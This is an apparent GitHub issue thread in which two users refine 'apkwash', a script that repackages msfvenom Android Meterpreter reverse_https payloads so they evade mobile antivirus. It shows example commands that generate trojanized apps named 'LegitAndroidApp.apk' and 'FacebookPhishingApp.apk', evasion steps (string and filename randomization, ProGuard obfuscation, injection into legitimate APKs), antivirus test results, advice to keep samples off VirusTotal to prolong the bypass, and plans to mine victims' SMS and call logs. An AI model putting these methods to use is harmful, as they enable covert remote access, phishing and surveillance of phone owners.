Issues with timwr apk merge script

[iamalsaher]

May I suggest adding support for xc0d3rz metasploit-apk-embed-payload, so that this script becomes one shop stop. Wash the APK and merge.

[jbreed]

@iamalsaher I agree, having one script to handle everything would be ideal. The weekend I put this script together I also put together https://github.com/jbreed/apkinjector for injecting into other payloads. This was without realizing @xc0d3rz has done this, or that msfvenom had an option for doing this (probably the path I will take).

Once I get more time in a couple of weeks I will refine the script if Rapid7 doesn't modify the payload output to obfuscate all the strings and filenames being flagged.

Feel free to fork the project!

Future modifications:

Examples:

apkwash -p android/meterpreter/reverse_https LHOST=\ LPORT=\ -o LegitAndroidApp.apk

Generating msfvenom payload

Pulling apart the package with APKTool

Modifying the payload to avoid AV detection

Building the package with APKTool

Signing the package

Complete: \/LegitAndroidApp.apk

apkwash -p android/meterpreter/reverse_https LHOST=\ LPORT=\ -x \.apk -o FacebookPhishingApp.apk

Generating msfvenom payload using '-x' option for injection into \.apk

Pulling apart the package with APKTool

Modifying the payload to avoid AV detection

Building the package with APKTool

Signing the package

Complete: \/FacebookPhishingApp.apk

## NOTE ## At the moment it appears msfvenom is doing a good job avoiding AV flags when using the '-x' option for injecting into an original package. With that, it isn't a big priority for handling the injection, which makes the apkinjector script useless at this time. When MSFVenom fails to stay ahead of the curve, then having the ability to manipulate parts of the payload as deemed necessary will be nice to have.

If obtaining this information in the script, then it can also handle generating a handler.rc file for spinning up the handler at a later point quickly, or even ask to start the handler.

[jbreed]

@timwr Do you guys plan on modifying the generated payload for string and filename obfuscation? Last I checked, the '-x' option was 0/36 on nodistribute, but for those looking for the obsolute smallest payload ideally the default payload already avoids AV.

[iamalsaher]

@jbreed Don't you think nodistribute lags behind. I generated a payload from Fatrat and Msfvenom. Both were 0 on nodistribute whereas on my personal device it was detected by 3 antivirus as Meterpreterthat is Avast, AVG, Kaspersky. And even after washing the APK, it was still detected by Kaspersky and Avast as potentially suspicious program.

And I don't know about any other antivirus that may have detected them

Unlike a Windows application, Android apps can have ample permissions and can do absolutely anything and still not be malicious.

YARA based rules won't be effective unless they definitely have something fixed which cannot be changed

So I suggest obfuscating everything.

What about integrating the script with ProGuard

So potential steps be

1. Generate payload
2. Wash the payload
3. ProGuard it
4. Embed the payload in an app

What do you think

[jbreed]

@iamalsaher I agree that I have seen nodistribute return no flags, but on the device I ran AVG, Kaspersky, and another to fully test. I never actually tested the -x payload on a device.

When you say "even after washing the APK, it was still detected by Kaspersky and Avast" are you referring to the output payload generated by this script? As this hasn't been tested and updated since noted in the readme, then it could have had a signature added since. Kaspersky, AVG, and Lookout all returned the output when last tested as "safe".

The main thing to take from this is looking over the script and seeing how simple the items that are being flagged are. I originally tried to find what was being flagged by using Evade, but this didn't help at all. I then found APKTool and opened the package, then manually removed/built the package until I found each file that contained an AV signature. At that point, I would add files back into the package with manipulations until I found the culprit. The funny thing, as seen in the script, most of the signatures are SIMPLE strings pointing directly to meterpreter. It would also be nice to remove some of the permissions not necessarily needed along with adding a random order they are placed into the manifest file (looping through an array of permissions).

[iamalsaher]

@jbreed Yes I am referring to the output payload generated by the script. In my research when I was using @timwr 's script for joining APK, it made a metasploit folder in the clean APK so it can quickly copy files, and the moment I installed the apk, all AVs came alive

Your script randomizes 3 things, whereas others are changed to static things already defined in the script

What I suggest as improvement in your script is, randomize everything that you have kept static, so that there is no signature that the APK has been washed

I have seen YARA rules of AVs, they always try to find something fixed, randomizing everything can just defeat it all, and then we can safely upload the files to even Virustotal.

That's the best thing about Android app hacking. The app can still not be malicious, so you can't guarantee anything

[jbreed]

@iamalsaher Yes, I agree about randomizing everything. As this is in bash, it can be done pretty basic as done for the filenames setup as variables. I'll go ahead and add that in really quick.

With the current script, I just now generated a basic payload.apk and ran the script against it for washed_payload.apk. Of course, 0/36 on nodistribute. I then put it on the phone. Lookout Mobile said it was safe even after install and launching. I then re-installed AVG (Free edition) and it also reports the app as safe. Just downloaded Kaspersky (Free) again and running it against the payload that is still on the phone to see how it responds. Not sure what is being flagged for you. Have you commented out the line for removing the payload files, then reviewed them? If you see more than 1 PayloadXXXXX.smali file, then the msfvenom generated payload you are running may be outdated. That, or I am running an outdated version of msfvenom.

[iamalsaher]

Try Avast, that thing always detects it as one or other. Before washing, it of course says metasploit PUP and after washing it says Potentially suspicious program

[jbreed]

@iamalsaher

The payload I just generated: -0 on nodistribute All were downloaded from Google Play and updated before running scans. -Verified for AVG Mobile Free -Verified for Kaspersky Mobile Free -Verified for Avast Free -Verified for Lookout Mobile

Something doesn't sound right. I'll update everything and see if anything potentially changed.

[iamalsaher]

I guess this is good enough. if we need to do a bit better, we can just randomize the order of permissions. Otherwise this is fine i guess. Let's improve apk injector

we can close this, I guess

[jbreed]

After updating and launching the app I did get Avast to give me a warning about a potentially unwanted program. Will need to see if anything was added, or if it detected a behavior that is deemed was potential to be bad (too many permissions, etc). I'm sure there are permissions that aren't necessary for every occasion so lines can be commented out as deemed necessary. Ideally, they are placed into an array and inserted into the manifest file in a random order.

[iamalsaher]

What about other AVs?

Would you feel free uploading it to virustotal

[jbreed]

Uploading anything to VirusTotal is asking AV companies to dig deeper into it specifically. You can, but the length of the bypass will shrinken.

On that note, my whole goal of even posting this was because I realized how sad Android AV companies are performing and how silly their signatures are. If you literally do these basic obfuscation techniques you avoid ALMOST (now that avast may flag) all AV's. Avast still let me install it, but popped up at a later point.

On another note, I think my next project (if not something for the BashBunny) will be to take SMS/Call logs from Meterpreter output, import them into a SQL Database, then make a pretty web interface for parsing over it easily. Probably utilize bootstrap, add checkboxes and filters for refined searches, etc. As it currently sits, anyone who cares to look over the information has to probably spend a good amount of time reviewing it.

[iamalsaher]

What I think about this is, aren't there people already scrounging the web, uploading suspicious stuff to VirusTotal

The reason signatures are silly cause, you have no definitive thing to flag it as a malware. Android non malicious apps come in all types of permissions, so AVs need to improve their heuristic analysis. Since it is behavior analysis you can't just claim it's malicious

One of the many reasons I love Android

In my free time, I guess I will make few malicious apps from the original ones and compare for common strings which might further help us in evading AVs

[iamalsaher]

@jbreed is it possible to talk somewhere private, twitter, fb. I need some suggestions from you